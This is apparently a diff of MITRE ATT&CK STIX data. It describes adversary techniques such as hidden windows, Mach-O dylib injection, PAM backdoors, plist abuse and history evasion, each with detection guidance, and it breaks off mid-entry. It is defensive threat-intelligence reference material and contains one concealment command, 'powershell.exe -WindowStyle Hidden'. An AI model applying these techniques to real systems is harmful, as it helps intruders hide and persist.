"spec_version": "2.1", + "id": "attack-pattern--04a5a8ab-3bc8-4c83-95c9-55274a89786d", + "created": "2022-07-08T12:39:29.684Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1583/007", + "external_id": "T1583.007" + }, + { + "source_name": "AWS Lambda Redirector", + "description": "Adam Chester. (2020, February 25). AWS Lambda Redirector. Retrieved July 8, 2022.", + "url": "https://blog.xpnsec.com/aws-lambda-redirector/" + }, + { + "source_name": "Detecting Command & Control in the Cloud", + "description": "Gary Golomb. (n.d.). Threat Hunting Series: Detecting Command & Control in the Cloud. Retrieved July 8, 2022.", + "url": "https://awakesecurity.com/blog/threat-hunting-series-detecting-command-control-in-the-cloud/" + }, + { + "source_name": "BlackWater Malware Cloudflare Workers", + "description": "Lawrence Abrams. (2020, March 14). BlackWater Malware Abuses Cloudflare Workers for C2 Communication. Retrieved July 8, 2022.", + "url": "https://www.bleepingcomputer.com/news/security/blackwater-malware-abuses-cloudflare-workers-for-c2-communication/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "Hidden Window", + "description": "Adversaries may implement hidden windows to conceal malicious activity from the plain sight of users. In some cases, windows that would typically be displayed when an application carries out an operation can be hidden. This may be utilized by system administrators to avoid disrupting user work environments when carrying out administrative tasks. Adversaries may abuse operating system functionality to hide otherwise visible windows from users so as not to alert the user to adversary activity on the system.\n\n### Windows\nThere are a variety of features in scripting languages in Windows, such as [PowerShell](https://attack.mitre.org/techniques/T1086), Jscript, and VBScript to make windows hidden. One example of this is powershell.exe -WindowStyle Hidden. (Citation: PowerShell About 2019)\n\n### Mac\nThe configurations for how applications run on macOS are listed in property list (plist) files. One of the tags in these files can be apple.awt.UIElement, which allows for Java applications to prevent the application's icon from appearing in the Dock. A common use for this is when applications run in the system tray, but don't also want to show up in the Dock. However, adversaries can abuse this feature and hide their running window.(Citation: Antiquated Mac Malware)\n", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Travis Smith, Tripwire" + ], + "x_mitre_detection": "Monitor processes and command-line arguments for actions indicative of hidden windows. In Windows, enable and configure event logging and PowerShell logging to check for the hidden window style. In MacOS, plist files are ASCII text files with a specific format, so they're relatively easy to parse. File monitoring can check for the apple.awt.UIElement or any other suspicious plist tag in plist files and flag them.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "macOS", + "Windows" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [], + "x_mitre_permissions_required": [ + "User" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--04ee0cb7-dac3-4c6c-9387-4c6aa096f4cf", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1143", + "external_id": "T1143" + }, + { + "source_name": "PowerShell About 2019", + "description": "Wheeler, S. et al.. (2019, May 1). About PowerShell.exe. Retrieved October 11, 2019.", + "url": "https://docs.microsoft.com/en-us/powershell/module/Microsoft.PowerShell.Core/About/about_PowerShell_exe?view=powershell-5.1" + }, + { + "source_name": "Antiquated Mac Malware", + "description": "Thomas Reed. (2017, January 18). New Mac backdoor using antiquated code. Retrieved July 5, 2017.", + "url": "https://blog.malwarebytes.com/threat-analysis/2017/01/new-mac-backdoor-using-antiquated-code/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "LC_LOAD_DYLIB Addition", + "description": "Mach-O binaries have a series of headers that are used to perform certain operations when a binary is loaded. The LC_LOAD_DYLIB header in a Mach-O binary tells macOS and OS X which dynamic libraries (dylibs) to load during execution time. These can be added ad-hoc to the compiled binary as long adjustments are made to the rest of the fields and dependencies (Citation: Writing Bad Malware for OSX). There are tools available to perform these changes. Any changes will invalidate digital signatures on binaries because the binary is being modified. Adversaries can remediate this issue by simply removing the LC_CODE_SIGNATURE command from the binary so that the signature isn’t checked at load time (Citation: Malware Persistence on OS X).", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_detection": "Monitor processes for those that may be used to modify binary headers. Monitor file systems for changes to application binaries and invalid checksums/signatures. Changes to binaries that do not line up with application updates or patches are also extremely suspicious.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "macOS" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "x_mitre_permissions_required": [ + "User" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--04ef4356-8926-45e2-9441-634b6f3dcecb", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1161", + "external_id": "T1161" + }, + { + "source_name": "Writing Bad Malware for OSX", + "description": "Patrick Wardle. (2015). Writing Bad @$$ Malware for OS X. Retrieved July 10, 2017.", + "url": "https://www.blackhat.com/docs/us-15/materials/us-15-Wardle-Writing-Bad-A-Malware-For-OS-X.pdf" + }, + { + "source_name": "Malware Persistence on OS X", + "description": "Patrick Wardle. (2015). Malware Persistence on OS X Yosemite. Retrieved July 10, 2017.", + "url": "https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-03-03T00:31:33.071Z", + "name": "Standard Encoding", + "description": "Adversaries may encode data with a standard data encoding system to make the content of command and control traffic more difficult to detect. Command and control (C2) information can be encoded using a standard data encoding system that adheres to existing protocol specifications. Common data encoding schemes include ASCII, Unicode, hexadecimal, Base64, and MIME.(Citation: Wikipedia Binary-to-text Encoding)(Citation: Wikipedia Character Encoding) Some data encoding systems may also result in data compression, such as gzip.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "command-and-control" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_contributors": [], + "x_mitre_deprecated": false, + "x_mitre_detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.(Citation: University of Birmingham C2)", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--04fd5427-79c7-44ea-ae13-11b24778ff1c", + "created": "2020-03-14T23:36:52.095Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1132/001", + "external_id": "T1132.001" + }, + { + "source_name": "University of Birmingham C2", + "description": "Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.", + "url": "https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf" + }, + { + "source_name": "Wikipedia Binary-to-text Encoding", + "description": "Wikipedia. (2016, December 26). Binary-to-text encoding. Retrieved March 1, 2017.", + "url": "https://en.wikipedia.org/wiki/Binary-to-text_encoding" + }, + { + "source_name": "Wikipedia Character Encoding", + "description": "Wikipedia. (2017, February 19). Character Encoding. Retrieved March 1, 2017.", + "url": "https://en.wikipedia.org/wiki/Character_encoding" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-09-29T21:14:57.263Z", + "name": "Embedded Payloads", + "description": "Adversaries may embed payloads within other files to conceal malicious content from defenses. Otherwise seemingly benign files (such as scripts and executables) may be abused to carry and obfuscate malicious payloads and content. In some cases, embedded payloads may also enable adversaries to [Subvert Trust Controls](https://attack.mitre.org/techniques/T1553) by not impacting execution controls such as digital signatures and notarization tickets.(Citation: Sentinel Labs) \n\nAdversaries may embed payloads in various file formats to hide payloads.(Citation: Microsoft Learn) This is similar to [Steganography](https://attack.mitre.org/techniques/T1027/003), though does not involve weaving malicious content into specific bytes and patterns related to legitimate digital media formats.(Citation: GitHub PSImage) \n\nFor example, adversaries have been observed embedding payloads within or as an overlay of an otherwise benign binary.(Citation: Securelist Dtrack2) Adversaries have also been observed nesting payloads (such as executables and run-only scripts) inside a file of the same format.(Citation: SentinelLabs reversing run-only applescripts 2021) \n\nEmbedded content may also be used as [Process Injection](https://attack.mitre.org/techniques/T1055) payloads used to infect benign system processes.(Citation: Trend Micro) These embedded then injected payloads may be used as part of the modules of malware designed to provide specific features such as encrypting C2 communications in support of an orchestrator module. For example, an embedded module may be injected into default browsers, allowing adversaries to then communicate via the network.(Citation: Malware Analysis Report ComRAT)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Nick Cairns, @grotezinfosec" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "macOS", + "Windows", + "Linux" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [], + "x_mitre_system_requirements": [ + "User" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--0533ab23-3f7d-463f-9bd8-634d27e4dee1", + "created": "2022-09-30T18:50:14.351Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1027/009", + "external_id": "T1027.009" + }, + { + "source_name": "GitHub PSImage", + "description": "Barrett Adams . (n.d.). Invoke-PSImage . Retrieved September 30, 2022.", + "url": "https://github.com/peewpw/Invoke-PSImage" + }, + { + "source_name": "Malware Analysis Report ComRAT", + "description": "CISA. (2020, October 29). Malware Analysis Report (AR20-303A) MAR-10310246-2.v1 – PowerShell Script: ComRAT. Retrieved September 30, 2022.", + "url": "https://www.cisa.gov/uscert/ncas/analysis-reports/ar20-303a" + }, + { + "source_name": "Trend Micro", + "description": "Karen Victor. (2020, May 18). Reflective Loading Runs Netwalker Fileless Ransomware. Retrieved September 30, 2022.", + "url": "https://www.trendmicro.com/en_us/research/20/e/netwalker-fileless-ransomware-injected-via-reflective-loading.html" + }, + { + "source_name": "Securelist Dtrack2", + "description": "KONSTANTIN ZYKOV. (2019, September 23). Hello! My name is Dtrack. Retrieved September 30, 2022.", + "url": "https://securelist.com/my-name-is-dtrack/93338/" + }, + { + "source_name": "Microsoft Learn", + "description": "Microsoft. (2021, April 6). 2.5 ExtraData. Retrieved September 30, 2022.", + "url": "https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-shllink/c41e062d-f764-4f13-bd4f-ea812ab9a4d1" + }, + { + "source_name": "SentinelLabs reversing run-only applescripts 2021", + "description": "Phil Stokes. (2021, January 11). FADE DEAD | Adventures in Reversing Malicious Run-Only AppleScripts. Retrieved September 29, 2022.", + "url": "https://www.sentinelone.com/labs/fade-dead-adventures-in-reversing-malicious-run-only-applescripts/" + }, + { + "source_name": "Sentinel Labs", + "description": "Phil Stokes. (2021, January 11). FADE DEAD | Adventures in Reversing Malicious Run-Only AppleScripts. Retrieved September 30, 2022.", + "url": "https://www.sentinelone.com/labs/fade-dead-adventures-in-reversing-malicious-run-only-applescripts/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-10-13T17:56:58.586Z", + "name": "Service Stop", + "description": "Adversaries may stop or disable services on a system to render those services unavailable to legitimate users. Stopping critical services can inhibit or stop response to an incident or aid in the adversary's overall objectives to cause damage to the environment. (Citation: Enterprise ATT&CK) Services may not allow for modification of their data stores while running. Adversaries may stop services in order to conduct Data Destruction. (Citation: Enterprise ATT&CK)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "inhibit-response-function" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "None" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [ + "File: File Modification", + "Command: Command Execution", + "Process: OS API Execution", + "Process: Process Termination", + "Service: Service Metadata", + "Windows Registry: Windows Registry Key Modification", + "Process: Process Creation" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--063b5b92-5361-481a-9c3f-95492ed9a2d8", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0881", + "external_id": "T0881" + }, + { + "source_name": "Enterprise ATT&CK", + "description": "Enterprise ATT&CK Enterprise ATT&CK Service Stop Retrieved. 2019/10/29 Service Stop Retrieved. 2019/10/29 ", + "url": "https://attack.mitre.org/techniques/T1489/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-05-11T14:00:00.188Z", + "name": "Plist Modification", + "description": "Property list (plist) files contain all of the information that macOS and OS X uses to configure applications and services. These files are UTF-8 encoded and formatted like XML documents via a series of keys surrounded by < >. They detail when programs should execute, file paths to the executables, program arguments, required OS permissions, and many others. plists are located in certain locations depending on their purpose such as /Library/Preferences (which execute with elevated privileges) and ~/Library/Preferences (which execute with a user's privileges). \nAdversaries can modify these plist files to point to their own code, can use them to execute their code in the context of another user, bypass whitelisting procedures, or even use them as a persistence mechanism. (Citation: Sofacy Komplex Trojan)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_deprecated": false, + "x_mitre_detection": "File system monitoring can determine if plist files are being modified. Users should not have permission to modify these in most cases. Some software tools like \"Knock Knock\" can detect persistence mechanisms and point to the specific files that are being referenced. This can be helpful to see what is actually being executed.\n\nMonitor process execution for abnormal process execution resulting from modified plist files. Monitor utilities used to modify plist files or that take a plist file as an argument, which may indicate suspicious activity.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "macOS" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "x_mitre_defense_bypassed": [ + "Application whitelisting", + "Process whitelisting", + "Whitelisting by file name or path" + ], + "x_mitre_permissions_required": [ + "User", + "Administrator" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--06780952-177c-4247-b978-79c357fb311f", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1150", + "external_id": "T1150" + }, + { + "source_name": "Sofacy Komplex Trojan", + "description": "Dani Creus, Tyler Halfpop, Robert Falcone. (2016, September 26). Sofacy's 'Komplex' OS X Trojan. Retrieved July 8, 2017.", + "url": "https://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-05-11T14:00:00.188Z", + "name": "Pluggable Authentication Modules", + "description": "Adversaries may modify pluggable authentication modules (PAM) to access user credentials or enable otherwise unwarranted access to accounts. PAM is a modular system of configuration files, libraries, and executable files which guide authentication for many services. The most common authentication module is pam_unix.so, which retrieves, sets, and verifies account authentication information in /etc/passwd and /etc/shadow.(Citation: Apple PAM)(Citation: Man Pam_Unix)(Citation: Red Hat PAM)\n\nAdversaries may modify components of the PAM system to create backdoors. PAM components, such as pam_unix.so, can be patched to accept arbitrary adversary supplied values as legitimate credentials.(Citation: PAM Backdoor)\n\nMalicious modifications to the PAM system may also be abused to steal credentials. Adversaries may infect PAM resources with code to harvest user credentials, since the values exchanged with PAM components may be plain-text since PAM does not store passwords.(Citation: PAM Creds)(Citation: Apple PAM)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "credential-access" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Scott Knight, @sdotknight, VMware Carbon Black", + "George Allen, VMware Carbon Black" + ], + "x_mitre_detection": "Monitor PAM configuration and module paths (ex: /etc/pam.d/) for changes. Use system-integrity tools such as AIDE and monitoring tools such as auditd to monitor PAM files.\n\nLook for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times (ex: when the user is not present) or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS" + ], + "x_mitre_version": "2.0", + "x_mitre_data_sources": [], + "x_mitre_permissions_required": [ + "root" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--06c00069-771a-4d57-8ef5-d3718c1a8771", + "created": "2020-06-26T04:01:09.648Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1556/003", + "external_id": "T1556.003" + }, + { + "source_name": "Apple PAM", + "description": "Apple. (2011, May 11). PAM - Pluggable Authentication Modules. Retrieved June 25, 2020.", + "url": "https://opensource.apple.com/source/dovecot/dovecot-239/dovecot/doc/wiki/PasswordDatabase.PAM.txt" + }, + { + "source_name": "Man Pam_Unix", + "description": "die.net. (n.d.). pam_unix(8) - Linux man page. Retrieved June 25, 2020.", + "url": "https://linux.die.net/man/8/pam_unix" + }, + { + "source_name": "Red Hat PAM", + "description": "Red Hat. (n.d.). CHAPTER 2. USING PLUGGABLE AUTHENTICATION MODULES (PAM). Retrieved June 25, 2020.", + "url": "https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/managing_smart_cards/pluggable_authentication_modules" + }, + { + "source_name": "PAM Backdoor", + "description": "zephrax. (2018, August 3). linux-pam-backdoor. Retrieved June 25, 2020.", + "url": "https://github.com/zephrax/linux-pam-backdoor" + }, + { + "source_name": "PAM Creds", + "description": "Fernández, J. M. (2018, June 27). Exfiltrating credentials via PAM backdoors & DNS requests. Retrieved June 26, 2020.", + "url": "https://x-c3ll.github.io/posts/PAM-backdoor-DNS/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "Revert Cloud Instance", + "description": "An adversary may revert changes made to a cloud instance after they have performed malicious activities in attempt to evade detection and remove evidence of their presence. In highly virtualized environments, such as cloud-based infrastructure, this may be accomplished by restoring virtual machine (VM) or data storage snapshots through the cloud management dashboard or cloud APIs.\n\nAnother variation of this technique is to utilize temporary storage attached to the compute instance. Most cloud providers provide various types of storage including persistent, local, and/or ephemeral, with the ephemeral types often reset upon stop/restart of the VM.(Citation: Tech Republic - Restore AWS Snapshots)(Citation: Google - Restore Cloud Snapshot)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Netskope" + ], + "x_mitre_detection": "Establish centralized logging of instance activity, which can be used to monitor and review system events even after reverting to a snapshot, rolling back changes, or changing persistence/type of storage. Monitor specifically for events related to snapshots and rollbacks and VM configuration changes, that are occurring outside of normal activity. To reduce false positives, valid change management procedures could introduce a known identifier that is logged with the change (e.g., tag or header) if supported by the cloud provider, to help distinguish valid, expected actions from malicious ones.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "IaaS" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [], + "x_mitre_permissions_required": [ + "User" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--0708ae90-d0eb-4938-9a76-d0fc94f6eec1", + "created": "2020-06-16T18:42:20.734Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1578/004", + "external_id": "T1578.004" + }, + { + "source_name": "Tech Republic - Restore AWS Snapshots", + "description": "Hardiman, N.. (2012, March 20). Backing up and restoring snapshots on Amazon EC2 machines. Retrieved October 8, 2019.", + "url": "https://www.techrepublic.com/blog/the-enterprise-cloud/backing-up-and-restoring-snapshots-on-amazon-ec2-machines/" + }, + { + "source_name": "Google - Restore Cloud Snapshot", + "description": "Google. (2019, October 7). Restoring and deleting persistent disk snapshots. Retrieved October 8, 2019.", + "url": "https://cloud.google.com/compute/docs/disks/restore-and-delete-snapshots" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "HISTCONTROL", + "description": "The HISTCONTROL environment variable keeps track of what should be saved by the history command and eventually into the ~/.bash_history file when a user logs out. This setting can be configured to ignore commands that start with a space by simply setting it to \"ignorespace\". HISTCONTROL can also be set to ignore duplicate commands by setting it to \"ignoredups\". In some Linux systems, this is set by default to \"ignoreboth\" which covers both of the previous examples. This means that “ ls” will not be saved, but “ls” would be saved by history. HISTCONTROL does not exist by default on macOS, but can be set by the user and will be respected. Adversaries can use this to operate without leaving traces by simply prepending a space to all of their terminal commands.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_detection": "Correlating a user session with a distinct lack of new commands in their .bash_history can be a clue to suspicious behavior. Additionally, users checking or changing their HISTCONTROL environment variable is also suspicious.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [], + "x_mitre_defense_bypassed": [ + "Log analysis", + "Host forensic analysis" + ], + "x_mitre_permissions_required": [ + "User" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--086952c4-5b90-4185-b573-02bad8e11953", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1148", + "external_id": "T1148" + }, + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/13.html", + "external_id": "CAPEC-13" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "Gather Victim Host Information", + "description": "Adversaries may gather information about the victim's hosts that can be used during targeting. Information about hosts may include a variety of details, including administrative data (ex: name, assigned IP, functionality, etc.) as well as specifics regarding its configuration (ex: operating system, language, etc.).\n\nAdversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Adversaries may also compromise sites then include malicious content designed to collect host information from visitors.(Citation: ATT ScanBox) Information about hosts may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) or [External Remote Services](https://attack.mitre.org/techniques/T1133)).", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "reconnaissance" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_detection": "Internet scanners may be used to look for patterns associated with malicious content designed to collect host information from visitors.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: ATT ScanBox)\n\nMuch of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "PRE" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--09312b1a-c3c6-4b45-9844-3ccc78e5d82f", + "created": "2020-10-02T16:39:33.966Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1592", + "external_id": "T1592" + }, + { + "source_name": "ATT ScanBox", + "description": "Blasco, J. (2014, August 28). Scanbox: A Reconnaissance Framework Used with Watering Hole Attacks. Retrieved October 19, 2020.", + "url": "https://cybersecurity.att.com/blogs/labs-research/scanbox-a-reconnaissance-framework-used-on-watering-hole-attacks" + }, + { + "source_name": "ThreatConnect Infrastructure Dec 2020", + "description": "ThreatConnect. (2020, December 15). Infrastructure Research and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.", + "url": "https://threatconnect.com/blog/infrastructure-research-hunting/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-10-13T17:56:58.786Z", + "name": "Modify Parameter", + "description": "Adversaries may modify parameters used to instruct industrial control system devices. These devices operate via programs that dictate how and when to perform actions based on such parameters. Such parameters can determine the extent to which an action is performed and may specify additional options. For example, a program on a control system device dictating motor processes may take a parameter defining the total number of seconds to run that motor. \n\nAn adversary can potentially modify these parameters to produce an outcome outside of what was intended by the operators. By modifying system and process critical parameters, the adversary may cause [Impact](https://attack.mitre.org/tactics/TA0105) to equipment and/or control processes. Modified parameters may be turned into dangerous, out-of-bounds, or unexpected values from typical operations. For example, specifying that a process run for more or less time than it should, or dictating an unusually high, low, or invalid value as a parameter.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "impair-process-control" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_contributors": [], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "None" + ], + "x_mitre_version": "1.3", + "x_mitre_data_sources": [ + "Application Log: Application Log Content", + "Operational Databases: Device Alarm", + "Network Traffic: Network Traffic Content" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": 